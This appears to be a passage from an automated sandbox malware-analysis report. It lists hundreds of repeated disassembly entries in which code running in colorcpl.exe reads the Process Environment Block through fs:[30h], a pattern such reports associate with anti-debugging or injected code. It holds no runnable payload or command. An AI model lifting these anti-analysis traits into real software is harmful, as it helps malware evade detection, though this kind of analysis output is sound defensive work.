              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726259 mov eax, dword ptr fs:[00000030h]10_2_22726259
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DA250 mov eax, dword ptr fs:[00000030h]10_2_227DA250
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DA250 mov eax, dword ptr fs:[00000030h]10_2_227DA250
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A8243 mov eax, dword ptr fs:[00000030h]10_2_227A8243
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A8243 mov ecx, dword ptr fs:[00000030h]10_2_227A8243
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271823B mov eax, dword ptr fs:[00000030h]10_2_2271823B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227302E1 mov eax, dword ptr fs:[00000030h]10_2_227302E1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227302E1 mov eax, dword ptr fs:[00000030h]10_2_227302E1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227302E1 mov eax, dword ptr fs:[00000030h]10_2_227302E1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F62D6 mov eax, dword ptr fs:[00000030h]10_2_227F62D6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A2C3 mov eax, dword ptr fs:[00000030h]10_2_2272A2C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A2C3 mov eax, dword ptr fs:[00000030h]10_2_2272A2C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A2C3 mov eax, dword ptr fs:[00000030h]10_2_2272A2C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A2C3 mov eax, dword ptr fs:[00000030h]10_2_2272A2C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A2C3 mov eax, dword ptr fs:[00000030h]10_2_2272A2C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227302A0 mov eax, dword ptr fs:[00000030h]10_2_227302A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227302A0 mov eax, dword ptr fs:[00000030h]10_2_227302A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B62A0 mov eax, dword ptr fs:[00000030h]10_2_227B62A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B62A0 mov ecx, dword ptr fs:[00000030h]10_2_227B62A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B62A0 mov eax, dword ptr fs:[00000030h]10_2_227B62A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B62A0 mov eax, dword ptr fs:[00000030h]10_2_227B62A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B62A0 mov eax, dword ptr fs:[00000030h]10_2_227B62A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B62A0 mov eax, dword ptr fs:[00000030h]10_2_227B62A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E284 mov eax, dword ptr fs:[00000030h]10_2_2275E284
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E284 mov eax, dword ptr fs:[00000030h]10_2_2275E284
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A0283 mov eax, dword ptr fs:[00000030h]10_2_227A0283
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A0283 mov eax, dword ptr fs:[00000030h]10_2_227A0283
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A0283 mov eax, dword ptr fs:[00000030h]10_2_227A0283
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C437C mov eax, dword ptr fs:[00000030h]10_2_227C437C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A035C mov eax, dword ptr fs:[00000030h]10_2_227A035C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A035C mov eax, dword ptr fs:[00000030h]10_2_227A035C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A035C mov eax, dword ptr fs:[00000030h]10_2_227A035C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A035C mov ecx, dword ptr fs:[00000030h]10_2_227A035C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A035C mov eax, dword ptr fs:[00000030h]10_2_227A035C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A035C mov eax, dword ptr fs:[00000030h]10_2_227A035C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EA352 mov eax, dword ptr fs:[00000030h]10_2_227EA352
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C8350 mov ecx, dword ptr fs:[00000030h]10_2_227C8350
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F634F mov eax, dword ptr fs:[00000030h]10_2_227F634F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h]10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F8324 mov eax, dword ptr fs:[00000030h]10_2_227F8324
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F8324 mov ecx, dword ptr fs:[00000030h]10_2_227F8324
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F8324 mov eax, dword ptr fs:[00000030h]10_2_227F8324
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F8324 mov eax, dword ptr fs:[00000030h]10_2_227F8324
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271C310 mov ecx, dword ptr fs:[00000030h]10_2_2271C310
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22740310 mov ecx, dword ptr fs:[00000030h]10_2_22740310
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A30B mov eax, dword ptr fs:[00000030h]10_2_2275A30B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A30B mov eax, dword ptr fs:[00000030h]10_2_2275A30B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A30B mov eax, dword ptr fs:[00000030h]10_2_2275A30B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E3F0 mov eax, dword ptr fs:[00000030h]10_2_2273E3F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E3F0 mov eax, dword ptr fs:[00000030h]10_2_2273E3F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E3F0 mov eax, dword ptr fs:[00000030h]10_2_2273E3F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227563FF mov eax, dword ptr fs:[00000030h]10_2_227563FF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h]10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h]10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h]10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h]10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h]10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h]10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h]10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h]10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE3DB mov eax, dword ptr fs:[00000030h]10_2_227CE3DB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE3DB mov eax, dword ptr fs:[00000030h]10_2_227CE3DB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE3DB mov ecx, dword ptr fs:[00000030h]10_2_227CE3DB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE3DB mov eax, dword ptr fs:[00000030h]10_2_227CE3DB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C43D4 mov eax, dword ptr fs:[00000030h]10_2_227C43D4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C43D4 mov eax, dword ptr fs:[00000030h]10_2_227C43D4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DC3CD mov eax, dword ptr fs:[00000030h]10_2_227DC3CD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A3C0 mov eax, dword ptr fs:[00000030h]10_2_2272A3C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A3C0 mov eax, dword ptr fs:[00000030h]10_2_2272A3C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A3C0 mov eax, dword ptr fs:[00000030h]10_2_2272A3C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A3C0 mov eax, dword ptr fs:[00000030h]10_2_2272A3C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A3C0 mov eax, dword ptr fs:[00000030h]10_2_2272A3C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A3C0 mov eax, dword ptr fs:[00000030h]10_2_2272A3C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227283C0 mov eax, dword ptr fs:[00000030h]10_2_227283C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227283C0 mov eax, dword ptr fs:[00000030h]10_2_227283C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227283C0 mov eax, dword ptr fs:[00000030h]10_2_227283C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227283C0 mov eax, dword ptr fs:[00000030h]10_2_227283C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A63C0 mov eax, dword ptr fs:[00000030h]10_2_227A63C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22718397 mov eax, dword ptr fs:[00000030h]10_2_22718397
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22718397 mov eax, dword ptr fs:[00000030h]10_2_22718397
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22718397 mov eax, dword ptr fs:[00000030h]10_2_22718397
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E388 mov eax, dword ptr fs:[00000030h]10_2_2271E388
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E388 mov eax, dword ptr fs:[00000030h]10_2_2271E388
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E388 mov eax, dword ptr fs:[00000030h]10_2_2271E388
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274438F mov eax, dword ptr fs:[00000030h]10_2_2274438F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274438F mov eax, dword ptr fs:[00000030h]10_2_2274438F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274C073 mov eax, dword ptr fs:[00000030h]10_2_2274C073
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22722050 mov eax, dword ptr fs:[00000030h]10_2_22722050
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6050 mov eax, dword ptr fs:[00000030h]10_2_227A6050
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6030 mov eax, dword ptr fs:[00000030h]10_2_227B6030
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271A020 mov eax, dword ptr fs:[00000030h]10_2_2271A020
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271C020 mov eax, dword ptr fs:[00000030h]10_2_2271C020
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E016 mov eax, dword ptr fs:[00000030h]10_2_2273E016
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E016 mov eax, dword ptr fs:[00000030h]10_2_2273E016
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E016 mov eax, dword ptr fs:[00000030h]10_2_2273E016
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E016 mov eax, dword ptr fs:[00000030h]10_2_2273E016
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A4000 mov ecx, dword ptr fs:[00000030h]10_2_227A4000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h]10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h]10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h]10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h]10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h]10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h]10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h]10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h]10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271C0F0 mov eax, dword ptr fs:[00000030h]10_2_2271C0F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227620F0 mov ecx, dword ptr fs:[00000030h]10_2_227620F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271A0E3 mov ecx, dword ptr fs:[00000030h]10_2_2271A0E3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A60E0 mov eax, dword ptr fs:[00000030h]10_2_227A60E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227280E9 mov eax, dword ptr fs:[00000030h]10_2_227280E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A20DE mov eax, dword ptr fs:[00000030h]10_2_227A20DE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E60B8 mov eax, dword ptr fs:[00000030h]10_2_227E60B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E60B8 mov ecx, dword ptr fs:[00000030h]10_2_227E60B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227180A0 mov eax, dword ptr fs:[00000030h]10_2_227180A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B80A8 mov eax, dword ptr fs:[00000030h]10_2_227B80A8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272208A mov eax, dword ptr fs:[00000030h]10_2_2272208A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4164 mov eax, dword ptr fs:[00000030h]10_2_227F4164
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4164 mov eax, dword ptr fs:[00000030h]10_2_227F4164
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B8158 mov eax, dword ptr fs:[00000030h]10_2_227B8158
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726154 mov eax, dword ptr fs:[00000030h]10_2_22726154
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726154 mov eax, dword ptr fs:[00000030h]10_2_22726154
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271C156 mov eax, dword ptr fs:[00000030h]10_2_2271C156
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B4144 mov eax, dword ptr fs:[00000030h]10_2_227B4144
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B4144 mov eax, dword ptr fs:[00000030h]10_2_227B4144
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B4144 mov ecx, dword ptr fs:[00000030h]10_2_227B4144
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B4144 mov eax, dword ptr fs:[00000030h]10_2_227B4144
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B4144 mov eax, dword ptr fs:[00000030h]10_2_227B4144
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22750124 mov eax, dword ptr fs:[00000030h]10_2_22750124
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CA118 mov ecx, dword ptr fs:[00000030h]10_2_227CA118
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CA118 mov eax, dword ptr fs:[00000030h]10_2_227CA118
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CA118 mov eax, dword ptr fs:[00000030h]10_2_227CA118
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CA118 mov eax, dword ptr fs:[00000030h]10_2_227CA118
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E0115 mov eax, dword ptr fs:[00000030h]10_2_227E0115
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov eax, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov ecx, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov eax, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov eax, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov ecx, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov eax, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov eax, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov ecx, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov eax, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CE10E mov ecx, dword ptr fs:[00000030h]10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227501F8 mov eax, dword ptr fs:[00000030h]10_2_227501F8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F61E5 mov eax, dword ptr fs:[00000030h]10_2_227F61E5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E1D0 mov eax, dword ptr fs:[00000030h]10_2_2279E1D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E1D0 mov eax, dword ptr fs:[00000030h]10_2_2279E1D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E1D0 mov ecx, dword ptr fs:[00000030h]10_2_2279E1D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E1D0 mov eax, dword ptr fs:[00000030h]10_2_2279E1D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E1D0 mov eax, dword ptr fs:[00000030h]10_2_2279E1D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E61C3 mov eax, dword ptr fs:[00000030h]10_2_227E61C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E61C3 mov eax, dword ptr fs:[00000030h]10_2_227E61C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A019F mov eax, dword ptr fs:[00000030h]10_2_227A019F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A019F mov eax, dword ptr fs:[00000030h]10_2_227A019F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A019F mov eax, dword ptr fs:[00000030h]10_2_227A019F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A019F mov eax, dword ptr fs:[00000030h]10_2_227A019F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271A197 mov eax, dword ptr fs:[00000030h]10_2_2271A197
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271A197 mov eax, dword ptr fs:[00000030h]10_2_2271A197
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271A197 mov eax, dword ptr fs:[00000030h]10_2_2271A197
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22760185 mov eax, dword ptr fs:[00000030h]10_2_22760185
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DC188 mov eax, dword ptr fs:[00000030h]10_2_227DC188
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DC188 mov eax, dword ptr fs:[00000030h]10_2_227DC188
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C4180 mov eax, dword ptr fs:[00000030h]10_2_227C4180
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C4180 mov eax, dword ptr fs:[00000030h]10_2_227C4180
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22752674 mov eax, dword ptr fs:[00000030h]10_2_22752674
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E866E mov eax, dword ptr fs:[00000030h]10_2_227E866E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E866E mov eax, dword ptr fs:[00000030h]10_2_227E866E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A660 mov eax, dword ptr fs:[00000030h]10_2_2275A660
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A660 mov eax, dword ptr fs:[00000030h]10_2_2275A660
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273C640 mov eax, dword ptr fs:[00000030h]10_2_2273C640
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E627 mov eax, dword ptr fs:[00000030h]10_2_2273E627
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22756620 mov eax, dword ptr fs:[00000030h]10_2_22756620
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758620 mov eax, dword ptr fs:[00000030h]10_2_22758620
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272262C mov eax, dword ptr fs:[00000030h]10_2_2272262C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762619 mov eax, dword ptr fs:[00000030h]10_2_22762619
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E609 mov eax, dword ptr fs:[00000030h]10_2_2279E609
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273260B mov eax, dword ptr fs:[00000030h]10_2_2273260B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273260B mov eax, dword ptr fs:[00000030h]10_2_2273260B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273260B mov eax, dword ptr fs:[00000030h]10_2_2273260B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273260B mov eax, dword ptr fs:[00000030h]10_2_2273260B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273260B mov eax, dword ptr fs:[00000030h]10_2_2273260B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273260B mov eax, dword ptr fs:[00000030h]10_2_2273260B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273260B mov eax, dword ptr fs:[00000030h]10_2_2273260B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E6F2 mov eax, dword ptr fs:[00000030h]10_2_2279E6F2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E6F2 mov eax, dword ptr fs:[00000030h]10_2_2279E6F2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E6F2 mov eax, dword ptr fs:[00000030h]10_2_2279E6F2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E6F2 mov eax, dword ptr fs:[00000030h]10_2_2279E6F2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A06F1 mov eax, dword ptr fs:[00000030h]10_2_227A06F1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A06F1 mov eax, dword ptr fs:[00000030h]10_2_227A06F1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A6C7 mov ebx, dword ptr fs:[00000030h]10_2_2275A6C7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A6C7 mov eax, dword ptr fs:[00000030h]10_2_2275A6C7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227566B0 mov eax, dword ptr fs:[00000030h]10_2_227566B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C6A6 mov eax, dword ptr fs:[00000030h]10_2_2275C6A6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724690 mov eax, dword ptr fs:[00000030h]10_2_22724690
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724690 mov eax, dword ptr fs:[00000030h]10_2_22724690
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728770 mov eax, dword ptr fs:[00000030h]10_2_22728770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
